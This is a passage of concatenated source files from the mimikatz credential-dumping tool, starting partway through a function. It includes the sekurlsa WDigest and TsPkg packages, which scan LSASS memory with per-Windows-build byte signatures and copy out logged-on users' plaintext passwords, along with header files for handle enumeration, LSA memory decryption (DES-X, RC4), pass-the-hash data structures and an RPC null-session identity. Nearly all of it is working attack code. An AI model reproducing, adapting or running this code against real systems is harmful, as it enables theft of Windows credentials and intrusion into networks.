&KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; 51 | 52 | if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, ARRAYSIZE(TsPkgReferences), (PVOID *) &TSGlobalCredTable, NULL, NULL, &TsOffsetIndex)) 53 | { 54 | aLsassMemory.address = TSGlobalCredTable; 55 | if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromAVLByLuid(&aLsassMemory, tsCredentialHelper[TsOffsetIndex].offsetToLuid, pData->LogonId)) 56 | { 57 | aLsassMemory.address = (PBYTE) aLsassMemory.address + tsCredentialHelper[TsOffsetIndex].offsetToTsPrimary; 58 | if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(PVOID))) 59 | { 60 | if(aLsassMemory.address = buffer) 61 | { 62 | aLocalMemory.address = &primaryCredential; 63 | if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_TS_PRIMARY_CREDENTIAL))) 64 | kuhl_m_sekurlsa_genericCredsOutput(&primaryCredential.credentials, pData, KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN); 65 | } 66 | } 67 | } 68 | } else kprintf(L"KO"); 69 | } -------------------------------------------------------------------------------- /modules/kull_m_handle.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_process.h" 9 | 10 | typedef enum _OBJECT_INFORMATION_CLASS 11 | { 12 | ObjectBasicInformation, 13 | ObjectNameInformation, 14 | ObjectTypeInformation, 15 | ObjectAllInformation, 16 | ObjectDataInformation 17 | } OBJECT_INFORMATION_CLASS, *POBJECT_INFORMATION_CLASS; 18 | 19 | typedef struct _OBJECT_TYPE_INFORMATION 20 | { 21 | UNICODE_STRING TypeName; 22 | ULONG TotalNumberOfObjects; 23 | ULONG TotalNumberOfHandles; 24 | ULONG TotalPagedPoolUsage; 25 | ULONG TotalNonPagedPoolUsage; 26 | ULONG TotalNamePoolUsage; 27 | ULONG TotalHandleTableUsage; 28 | ULONG HighWaterNumberOfObjects; 29 | ULONG HighWaterNumberOfHandles; 30 | ULONG HighWaterPagedPoolUsage; 31 | ULONG HighWaterNonPagedPoolUsage; 32 | ULONG HighWaterNamePoolUsage; 33 | ULONG HighWaterHandleTableUsage; 34 | ULONG InvalidAttributes; 35 | GENERIC_MAPPING GenericMapping; 36 | ULONG ValidAccessMask; 37 | BOOLEAN SecurityRequired; 38 | BOOLEAN MaintainHandleCount; 39 | // ... 40 | ULONG PoolType; 41 | ULONG DefaultPagedPoolCharge; 42 | ULONG DefaultNonPagedPoolCharge; 43 | } OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; 44 | 45 | typedef struct __PUBLIC_OBJECT_TYPE_INFORMATION 46 | { 47 | UNICODE_STRING TypeName; 48 | ULONG Reserved [22]; // reserved for internal use 49 | } PUBLIC_OBJECT_TYPE_INFORMATION, *PPUBLIC_OBJECT_TYPE_INFORMATION; 50 | 51 | typedef struct _OBJECT_BASIC_INFORMATION 52 | { 53 | ULONG Attributes; 54 | ACCESS_MASK GrantedAccess; 55 | ULONG HandleCount; 56 | ULONG PointerCount; 57 | ULONG PagedPoolCharge; 58 | ULONG NonPagedPoolCharge; 59 | ULONG Reserved[3]; 60 | ULONG NameInfoSize; 61 | ULONG TypeInfoSize; 62 | ULONG SecurityDescriptorSize; 63 | LARGE_INTEGER CreationTime; 64 | } OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; 65 | 66 | typedef struct _PUBLIC_OBJECT_BASIC_INFORMATION 67 | { 68 | ULONG Attributes; 69 | ACCESS_MASK GrantedAccess; 70 | ULONG HandleCount; 71 | ULONG PointerCount; 72 | ULONG Reserved[10]; // reserved for internal use 73 | } PUBLIC_OBJECT_BASIC_INFORMATION, *PPUBLIC_OBJECT_BASIC_INFORMATION; 74 | 75 | extern NTSTATUS WINAPI NtQueryObject(IN OPTIONAL HANDLE Handle, IN OBJECT_INFORMATION_CLASS ObjectInformationClass, OUT OPTIONAL PVOID ObjectInformation, IN ULONG ObjectInformationLength, OUT OPTIONAL PULONG ReturnLength); 76 | 77 | typedef struct _SYSTEM_HANDLE 78 | { 79 | DWORD ProcessId; 80 | BYTE ObjectTypeNumber; 81 | BYTE Flags; 82 | USHORT Handle; 83 | PVOID Object; 84 | ACCESS_MASK GrantedAccess; 85 | } SYSTEM_HANDLE, *PSYSTEM_HANDLE; 86 | 87 | typedef struct _SYSTEM_HANDLE_INFORMATION 88 | { 89 | DWORD HandleCount; 90 | SYSTEM_HANDLE Handles[ANYSIZE_ARRAY]; 91 | } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; 92 | 93 | typedef BOOL (CALLBACK * PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK) (PSYSTEM_HANDLE pSystemHandle, PVOID pvArg); 94 | typedef BOOL (CALLBACK * PKULL_M_HANDLE_ENUM_CALLBACK) (HANDLE handle, PSYSTEM_HANDLE pSystemHandle, PVOID pvArg); 95 | 96 | typedef struct _HANDLE_ENUM_DATA 97 | { 98 | PCUNICODE_STRING type; 99 | DWORD dwDesiredAccess; 100 | DWORD dwOptions; 101 | PKULL_M_HANDLE_ENUM_CALLBACK callBack; 102 | PVOID pvArg; 103 | } HANDLE_ENUM_DATA, *PHANDLE_ENUM_DATA; 104 | 105 | NTSTATUS kull_m_handle_getHandles(PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg); 106 | NTSTATUS kull_m_handle_getHandlesOfType(PKULL_M_HANDLE_ENUM_CALLBACK callBack, LPCTSTR type, DWORD dwDesiredAccess, DWORD dwOptions, PVOID pvArg); 107 | 108 | BOOL CALLBACK kull_m_handle_getHandlesOfType_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg); 109 | 110 | BOOL kull_m_handle_GetUserObjectInformation(HANDLE hObj, int nIndex, PVOID *pvInfo, PDWORD nLength); -------------------------------------------------------------------------------- /modules/kull_m_xml.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_xml.h" 7 | 8 | IXMLDOMDocument * kull_m_xml_CreateAndInitDOM() 9 | { 10 | IXMLDOMDocument *pDoc = NULL; 11 | HRESULT hr = CoCreateInstance(&CLSID_DOMDocument, NULL, CLSCTX_INPROC_SERVER, &IID_IXMLDOMDocument, (void **) &pDoc); 12 | if(hr == S_OK) 13 | { 14 | IXMLDOMDocument_put_async(pDoc, VARIANT_FALSE); 15 | IXMLDOMDocument_put_validateOnParse(pDoc, VARIANT_FALSE); 16 | IXMLDOMDocument_put_resolveExternals(pDoc, VARIANT_FALSE); 17 | IXMLDOMDocument_put_preserveWhiteSpace(pDoc, VARIANT_FALSE); 18 | } 19 | else PRINT_ERROR(L"CoCreateInstance: 0x%08x\n", hr); 20 | return pDoc; 21 | } 22 | 23 | void kull_m_xml_ReleaseDom(IXMLDOMDocument *pDoc) 24 | { 25 | if(pDoc) 26 | IXMLDOMDocument_Release(pDoc); 27 | } 28 | 29 | BOOL kull_m_xml_LoadXMLFile(IXMLDOMDocument *pXMLDom, PCWSTR filename) 30 | { 31 | BOOL status = FALSE; 32 | VARIANT varFileName; 33 | VARIANT_BOOL varStatus; 34 | BSTR bFilename; 35 | HRESULT hr; 36 | if(filename) 37 | { 38 | if(bFilename = SysAllocString(filename)) 39 | { 40 | VariantInit(&varFileName); 41 | V_VT(&varFileName) = VT_BSTR; 42 | V_BSTR(&varFileName) = bFilename; 43 | hr = IXMLDOMDocument_load(pXMLDom, varFileName, &varStatus); 44 | status = (hr == S_OK); 45 | if(!status) 46 | PRINT_ERROR(L"IXMLDOMDocument_load: 0x%08x\n", hr); 47 | SysFreeString(bFilename); 48 | } 49 | } 50 | return status; 51 | } 52 | 53 | BOOL kull_m_xml_SaveXMLFile(IXMLDOMDocument *pXMLDom, PCWSTR filename) 54 | { 55 | BOOL status = FALSE; 56 | VARIANT varFileName; 57 | BSTR bFilename; 58 | HRESULT hr; 59 | if(filename) 60 | { 61 | if(bFilename = SysAllocString(filename)) 62 | { 63 | VariantInit(&varFileName); 64 | V_VT(&varFileName) = VT_BSTR; 65 | V_BSTR(&varFileName) = bFilename; 66 | hr = IXMLDOMDocument_save(pXMLDom, varFileName); 67 | status = (hr == S_OK); 68 | if(!status) 69 | PRINT_ERROR(L"IXMLDOMDocument_save: 0x%08x\n", hr); 70 | SysFreeString(bFilename); 71 | } 72 | } 73 | return status; 74 | } 75 | 76 | wchar_t * kull_m_xml_getAttribute(IXMLDOMNode *pNode, PCWSTR name) 77 | { 78 | wchar_t *result = NULL; 79 | IXMLDOMNamedNodeMap *map; 80 | IXMLDOMNode *nAttr; 81 | BSTR bstrGeneric; 82 | long length, i; 83 | BOOL isMatch = FALSE; 84 | 85 | if(IXMLDOMNode_get_attributes(pNode, &map) == S_OK) 86 | { 87 | if(IXMLDOMNamedNodeMap_get_length(map, &length) == S_OK) 88 | { 89 | for(i = 0; (i < length) && !isMatch; i++) 90 | { 91 | if(IXMLDOMNamedNodeMap_get_item(map, i, &nAttr) == S_OK) 92 | { 93 | if(IXMLDOMNode_get_nodeName(nAttr, &bstrGeneric) == S_OK) 94 | { 95 | isMatch = (_wcsicmp(name, bstrGeneric) == 0); 96 | SysFreeString(bstrGeneric); 97 | if(isMatch) 98 | { 99 | if(IXMLDOMNode_get_text(nAttr, &bstrGeneric) == S_OK) 100 | { 101 | kull_m_string_copy(&result, bstrGeneric); 102 | SysFreeString(bstrGeneric); 103 | } 104 | } 105 | } 106 | IXMLDOMNode_Release(nAttr); 107 | } 108 | } 109 | } 110 | IXMLDOMNamedNodeMap_Release(map); 111 | } 112 | return result; 113 | } 114 | 115 | wchar_t * kull_m_xml_getTextValue(IXMLDOMNode *pNode, PCWSTR name) 116 | { 117 | wchar_t *result = NULL; 118 | IXMLDOMNode *pSingleNode, *pChild; 119 | BSTR bstrGeneric; 120 | 121 | if((IXMLDOMNode_selectSingleNode(pNode, (BSTR) name, &pSingleNode) == S_OK) && pSingleNode) 122 | { 123 | if((IXMLDOMNode_get_firstChild(pSingleNode, &pChild) == S_OK) && pChild) 124 | { 125 | if(IXMLDOMNode_get_text(pChild, &bstrGeneric) == S_OK) 126 | { 127 | kull_m_string_copy(&result, bstrGeneric); 128 | SysFreeString(bstrGeneric); 129 | } 130 | } 131 | } 132 | return result; 133 | } -------------------------------------------------------------------------------- /plog/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "../globals_sekurlsa.h" 8 | #if !defined(_M_ARM64) 9 | NTSTATUS kuhl_m_sekurlsa_nt5_init(); 10 | NTSTATUS kuhl_m_sekurlsa_nt5_clean(); 11 | 12 | NTSTATUS kuhl_m_sekurlsa_nt5_LsaInitializeProtectedMemory(); 13 | 14 | const PLSA_PROTECT_MEMORY kuhl_m_sekurlsa_nt5_pLsaProtectMemory, kuhl_m_sekurlsa_nt5_pLsaUnprotectMemory; 15 | 16 | BOOL kuhl_m_sekurlsa_nt5_isOld(DWORD osBuildNumber, DWORD moduleTimeStamp); 17 | NTSTATUS kuhl_m_sekurlsa_nt5_acquireKeys(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule); 18 | BOOL kuhl_m_sekurlsa_nt5_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PBYTE Key, SIZE_T taille); 19 | 20 | VOID WINAPI kuhl_m_sekurlsa_nt5_LsaProtectMemory(IN PVOID Buffer, IN ULONG BufferSize); 21 | VOID WINAPI kuhl_m_sekurlsa_nt5_LsaUnprotectMemory(IN PVOID Buffer, IN ULONG BufferSize); 22 | NTSTATUS kuhl_m_sekurlsa_nt5_LsaEncryptMemory(PUCHAR pMemory, ULONG cbMemory, BOOL Encrypt); 23 | 24 | /* All code below is very (very) inspired from Microsoft SymCrypt 25 | > github.com/Microsoft/SymCrypt 26 | Lots of thanks to Niels Ferguson ( github.com/NielsFerguson ) 27 | 28 | Was not able to use CryptoAPI because: 29 | - DES-X is not supported 30 | - even if, DES-X main DES key is stored already scheduled, so not compatible with CryptoAPI 31 | - RC4 is not supported with key > 128 bits (LSA uses one of 2048 bits) 32 | 33 | A good example of 'do not use what I use' 34 | */ 35 | typedef struct _SYMCRYPT_NT5_DES_EXPANDED_KEY { 36 | UINT32 roundKey[16][2]; 37 | } SYMCRYPT_NT5_DES_EXPANDED_KEY, *PSYMCRYPT_NT5_DES_EXPANDED_KEY; 38 | typedef const SYMCRYPT_NT5_DES_EXPANDED_KEY * PCSYMCRYPT_NT5_DES_EXPANDED_KEY; 39 | 40 | typedef struct _SYMCRYPT_NT5_DESX_EXPANDED_KEY { 41 | BYTE inputWhitening[8]; 42 | BYTE outputWhitening[8]; 43 | SYMCRYPT_NT5_DES_EXPANDED_KEY desKey; 44 | } SYMCRYPT_NT5_DESX_EXPANDED_KEY, *PSYMCRYPT_NT5_DESX_EXPANDED_KEY; 45 | typedef const SYMCRYPT_NT5_DESX_EXPANDED_KEY * PCSYMCRYPT_NT5_DESX_EXPANDED_KEY; 46 | 47 | typedef struct _SYMCRYPT_RC4_STATE { 48 | BYTE S[256]; 49 | BYTE i; 50 | BYTE j; 51 | } SYMCRYPT_RC4_STATE, *PSYMCRYPT_RC4_STATE; 52 | 53 | #define ROL32( x, n ) _rotl( (x), (n) ) 54 | #define ROR32( x, n ) _rotr( (x), (n) ) 55 | #define F(L, R, keyptr) { \ 56 | Ta = keyptr[0] ^ R; \ 57 | Tb = keyptr[1] ^ R; \ 58 | Tb = ROR32(Tb, 4); \ 59 | L ^= *(UINT32 *)((PBYTE)SymCryptDesSpbox[0] + ( Ta & 0xfc)); \ 60 | L ^= *(UINT32 *)((PBYTE)SymCryptDesSpbox[1] + ( Tb & 0xfc)); \ 61 | L ^= *(UINT32 *)((PBYTE)SymCryptDesSpbox[2] + ((Ta>> 8)& 0xfc)); \ 62 | L ^= *(UINT32 *)((PBYTE)SymCryptDesSpbox[3] + ((Tb>> 8)& 0xfc)); \ 63 | L ^= *(UINT32 *)((PBYTE)SymCryptDesSpbox[4] + ((Ta>>16)& 0xfc)); \ 64 | L ^= *(UINT32 *)((PBYTE)SymCryptDesSpbox[5] + ((Tb>>16)& 0xfc)); \ 65 | L ^= *(UINT32 *)((PBYTE)SymCryptDesSpbox[6] + ((Ta>>24)& 0xfc)); \ 66 | L ^= *(UINT32 *)((PBYTE)SymCryptDesSpbox[7] + ((Tb>>24)& 0xfc)); } 67 | 68 | VOID SymCryptDesGenCrypt2(PCSYMCRYPT_NT5_DES_EXPANDED_KEY pExpandedKey, LPCBYTE pbSrc, PBYTE pbDst, BOOL Encrypt); 69 | VOID SymCryptDesxDecrypt2(PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedKey, LPCBYTE pbSrc, PBYTE pbDst); 70 | VOID SymCryptDesxEncrypt2(PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedKey, LPCBYTE pbSrc, PBYTE pbDst); 71 | VOID SymCryptDesxCbcDecrypt2(PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedKey, PBYTE pbChainingValue, LPCBYTE pbSrc, PBYTE pbDst, SIZE_T cbData); 72 | VOID SymCryptDesxCbcEncrypt2(PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedKey, PBYTE pbChainingValue, LPCBYTE pbSrc, PBYTE pbDst, SIZE_T cbData); 73 | 74 | typedef VOID (* PCRYPT_ENCRYPT) (PCSYMCRYPT_NT5_DESX_EXPANDED_KEY pExpandedKey, PBYTE pbChainingValue, LPCBYTE pbSrc, PBYTE pbDst, SIZE_T cbData); 75 | 76 | BOOL SymCryptRc4Init2(PSYMCRYPT_RC4_STATE pState, LPCBYTE pbKey, SIZE_T cbKey); 77 | VOID SymCryptRc4Crypt2(PSYMCRYPT_RC4_STATE pState, LPCBYTE pbSrc, PBYTE pbDst, SIZE_T cbData); 78 | #endif -------------------------------------------------------------------------------- /plog/modules/sekurlsa/globals_sekurlsa.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "../modules/kull_m_patch.h" 9 | #include "../modules/kull_m_process.h" 10 | #include "../modules/kull_m_handle.h" 11 | #include "../modules/rpc/kull_m_rpc.h" 12 | 13 | typedef struct _RTL_BALANCED_LINKS { 14 | struct _RTL_BALANCED_LINKS *Parent; 15 | struct _RTL_BALANCED_LINKS *LeftChild; 16 | struct _RTL_BALANCED_LINKS *RightChild; 17 | CHAR Balance; 18 | UCHAR Reserved[3]; // align 19 | } RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS; 20 | 21 | typedef struct _RTL_AVL_TABLE { 22 | RTL_BALANCED_LINKS BalancedRoot; 23 | PVOID OrderedPointer; 24 | ULONG WhichOrderedElement; 25 | ULONG NumberGenericTableElements; 26 | ULONG DepthOfTree; 27 | PRTL_BALANCED_LINKS RestartKey; 28 | ULONG DeleteCount; 29 | PVOID CompareRoutine; // 30 | PVOID AllocateRoutine; // 31 | PVOID FreeRoutine; // 32 | PVOID TableContext; 33 | } RTL_AVL_TABLE, *PRTL_AVL_TABLE; 34 | 35 | typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL { 36 | LSA_UNICODE_STRING UserName; 37 | LSA_UNICODE_STRING Domaine; 38 | LSA_UNICODE_STRING Password; 39 | } KIWI_GENERIC_PRIMARY_CREDENTIAL, *PKIWI_GENERIC_PRIMARY_CREDENTIAL; 40 | 41 | typedef struct _KUHL_M_SEKURLSA_LIB { 42 | KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION Informations; 43 | BOOL isPresent; 44 | BOOL isInit; 45 | } KUHL_M_SEKURLSA_LIB, *PKUHL_M_SEKURLSA_LIB; 46 | 47 | typedef struct _KUHL_M_SEKURLSA_OS_CONTEXT { 48 | DWORD MajorVersion; 49 | DWORD MinorVersion; 50 | DWORD BuildNumber; 51 | } KUHL_M_SEKURLSA_OS_CONTEXT, *PKUHL_M_SEKURLSA_OS_CONTEXT; 52 | 53 | typedef struct _KUHL_M_SEKURLSA_CONTEXT { 54 | PKULL_M_MEMORY_HANDLE hLsassMem; 55 | KUHL_M_SEKURLSA_OS_CONTEXT osContext; 56 | } KUHL_M_SEKURLSA_CONTEXT, *PKUHL_M_SEKURLSA_CONTEXT; 57 | 58 | typedef NTSTATUS (* PKUHL_M_SEKURLSA_ACQUIRE_KEYS_FUNCS) (PKUHL_M_SEKURLSA_CONTEXT cLsass, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION lsassLsaSrvModule); 59 | typedef NTSTATUS (* PKUHL_M_SEKURLSA_INIT) (); 60 | 61 | typedef struct _KUHL_M_SEKURLSA_LOCAL_HELPER { 62 | PKUHL_M_SEKURLSA_INIT initLocalLib; 63 | PKUHL_M_SEKURLSA_INIT cleanLocalLib; 64 | PKUHL_M_SEKURLSA_ACQUIRE_KEYS_FUNCS AcquireKeys; 65 | const PLSA_PROTECT_MEMORY * pLsaProtectMemory; 66 | const PLSA_PROTECT_MEMORY * pLsaUnprotectMemory; 67 | } KUHL_M_SEKURLSA_LOCAL_HELPER, *PKUHL_M_SEKURLSA_LOCAL_HELPER; 68 | 69 | typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA { 70 | PKUHL_M_SEKURLSA_CONTEXT cLsass; 71 | const KUHL_M_SEKURLSA_LOCAL_HELPER * lsassLocalHelper; 72 | PLUID LogonId; 73 | PLSA_UNICODE_STRING UserName; 74 | PLSA_UNICODE_STRING LogonDomain; 75 | ULONG LogonType; 76 | ULONG Session; 77 | PVOID pCredentials; 78 | PSID pSid; 79 | PVOID pCredentialManager; 80 | FILETIME LogonTime; 81 | PLSA_UNICODE_STRING LogonServer; 82 | } KIWI_BASIC_SECURITY_LOGON_SESSION_DATA, *PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA; 83 | 84 | typedef void (CALLBACK * PKUHL_M_SEKURLSA_EXTERNAL) (IN CONST PLUID luid, IN CONST PUNICODE_STRING username, IN CONST PUNICODE_STRING domain, IN CONST PUNICODE_STRING password, IN CONST PBYTE lm, IN CONST PBYTE ntlm, IN OUT LPVOID pvData); 85 | typedef void (CALLBACK * PKUHL_M_SEKURLSA_ENUM_LOGONDATA) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData); 86 | typedef BOOL (CALLBACK * PKUHL_M_SEKURLSA_ENUM) (IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData); 87 | 88 | typedef struct _KUHL_M_SEKURLSA_PACKAGE { 89 | const wchar_t * Name; 90 | PKUHL_M_SEKURLSA_ENUM_LOGONDATA CredsForLUIDFunc; 91 | BOOL isValid; 92 | const wchar_t * ModuleName; 93 | KUHL_M_SEKURLSA_LIB Module; 94 | } KUHL_M_SEKURLSA_PACKAGE, *PKUHL_M_SEKURLSA_PACKAGE; 95 | 96 | typedef struct _SEKURLSA_PTH_DATA { 97 | PLUID LogonId; 98 | LPBYTE NtlmHash; 99 | LPBYTE Aes256Key; 100 | LPBYTE Aes128Key; 101 | BOOL isReplaceOk; 102 | } SEKURLSA_PTH_DATA, *PSEKURLSA_PTH_DATA; -------------------------------------------------------------------------------- /plog/modules/sekurlsa/packages/kuhl_m_sekurlsa_wdigest.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kuhl_m_sekurlsa_wdigest.h" 7 | #if defined(_M_ARM64) 8 | BYTE PTRN_WIN6_PasswdSet[] = { 0xc4, 0x22, 0x40, 0xb9, 0x8b, 0xa2, 0x00, 0x91, 0x28, 0x21, 0x40, 0xb9, 0x1f, 0x01, 0x04, 0x6b}; 9 | KULL_M_PATCH_GENERIC WDigestReferences[] = { 10 | {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WIN6_PasswdSet), PTRN_WIN6_PasswdSet}, {0, NULL}, {-48, 8, 48}}, 11 | }; 12 | #elif defined(_M_X64) 13 | BYTE PTRN_WIN5_PasswdSet[] = {0x48, 0x3b, 0xda, 0x74}; 14 | BYTE PTRN_WIN6_PasswdSet[] = {0x48, 0x3b, 0xd9, 0x74}; 15 | KULL_M_PATCH_GENERIC WDigestReferences[] = { 16 | {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_PasswdSet), PTRN_WIN5_PasswdSet}, {0, NULL}, {-4, 36}}, 17 | {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_PasswdSet), PTRN_WIN5_PasswdSet}, {0, NULL}, {-4, 48}}, 18 | {KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WIN6_PasswdSet), PTRN_WIN6_PasswdSet}, {0, NULL}, {-4, 48}}, 19 | }; 20 | #elif defined(_M_IX86) 21 | BYTE PTRN_WIN5_PasswdSet[] = {0x74, 0x18, 0x8b, 0x4d, 0x08, 0x8b, 0x11}; 22 | BYTE PTRN_WIN6_PasswdSet[] = {0x74, 0x11, 0x8b, 0x0b, 0x39, 0x4e, 0x10}; 23 | BYTE PTRN_WIN63_PasswdSet[] = {0x74, 0x15, 0x8b, 0x0a, 0x39, 0x4e, 0x10}; 24 | BYTE PTRN_WIN64_PasswdSet[] = {0x74, 0x15, 0x8b, 0x0f, 0x39, 0x4e, 0x10}; 25 | BYTE PTRN_WIN1809_PasswdSet[] = {0x74, 0x15, 0x8b, 0x17, 0x39, 0x56, 0x10}; 26 | KULL_M_PATCH_GENERIC WDigestReferences[] = { 27 | {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_PasswdSet), PTRN_WIN5_PasswdSet}, {0, NULL}, {-6, 36}}, 28 | {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_PasswdSet), PTRN_WIN5_PasswdSet}, {0, NULL}, {-6, 28}}, 29 | {KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WIN6_PasswdSet), PTRN_WIN6_PasswdSet}, {0, NULL}, {-6, 32}}, 30 | {KULL_M_WIN_MIN_BUILD_BLUE, {sizeof(PTRN_WIN63_PasswdSet), PTRN_WIN63_PasswdSet}, {0, NULL}, {-4, 32}}, 31 | {KULL_M_WIN_MIN_BUILD_10, {sizeof(PTRN_WIN64_PasswdSet), PTRN_WIN64_PasswdSet}, {0, NULL}, {-6, 32}}, 32 | {KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_WIN1809_PasswdSet), PTRN_WIN1809_PasswdSet}, {0, NULL}, {-6, 32}}, 33 | }; 34 | #endif 35 | 36 | PKIWI_WDIGEST_LIST_ENTRY l_LogSessList = NULL; 37 | LONG offsetWDigestPrimary = 0; 38 | 39 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"WdiGEst.dLl", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}}; 40 | const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_single_package[] = {&kuhl_m_sekurlsa_wdigest_package}; 41 | 42 | NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[]) 43 | { 44 | return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_wdigest_single_package, 1); 45 | } 46 | 47 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) 48 | { 49 | KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; 50 | SIZE_T taille; 51 | BOOL wasNotInit = !kuhl_m_sekurlsa_wdigest_package.Module.isInit; 52 | 53 | if(kuhl_m_sekurlsa_wdigest_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_wdigest_package.Module, WDigestReferences, ARRAYSIZE(WDigestReferences), (PVOID *) &l_LogSessList, NULL, NULL, &offsetWDigestPrimary)) 54 | { 55 | #if defined(_M_ARM64) 56 | if(wasNotInit) 57 | l_LogSessList = (PKIWI_WDIGEST_LIST_ENTRY)((PBYTE)l_LogSessList + sizeof(RTL_CRITICAL_SECTION)); 58 | #endif 59 | aLsassMemory.address = l_LogSessList; 60 | taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL); 61 | if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId)) 62 | { 63 | if(aLocalMemory.address = LocalAlloc(LPTR, taille)) 64 | { 65 | if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, taille)) 66 | kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalMemory.address + offsetWDigestPrimary), pData, 0); 67 | LocalFree(aLocalMemory.address); 68 | } 69 | } 70 | } else kprintf(L"KO"); 71 | } -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #ifndef __REQUIRED_RPCNDR_H_VERSION__ 9 | #define __REQUIRED_RPCNDR_H_VERSION__ 475 10 | #endif 11 | 12 | #include 13 | #include 14 | 15 | #ifndef __RPCNDR_H_VERSION__ 16 | #error this stub requires an updated version of 17 | #endif // __RPCNDR_H_VERSION__ 18 | 19 | #include "midles.h" 20 | #include 21 | #include "../kull_m_string.h" 22 | #include "../kull_m_crypto.h" 23 | #include "../kull_m_process.h" 24 | 25 | #define NDR_TSI_20 { {0x8a885d04, 0x1ceb, 0x11c9, { 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }}, { 2, 0 }} 26 | 27 | typedef DWORD NET_API_STATUS; 28 | typedef UNICODE_STRING RPC_UNICODE_STRING; 29 | 30 | LPCWSTR KULL_M_RPC_AUTHNLEV[7]; 31 | LPCWSTR KULL_M_RPC_AUTHNSVC(DWORD AuthnSvc); 32 | const SEC_WINNT_AUTH_IDENTITY KULL_M_RPC_NULLSESSION; 33 | 34 | #define KULL_M_RPC_AUTH_IDENTITY_HANDLE_NULLSESSION ((RPC_AUTH_IDENTITY_HANDLE) &KULL_M_RPC_NULLSESSION) 35 | 36 | 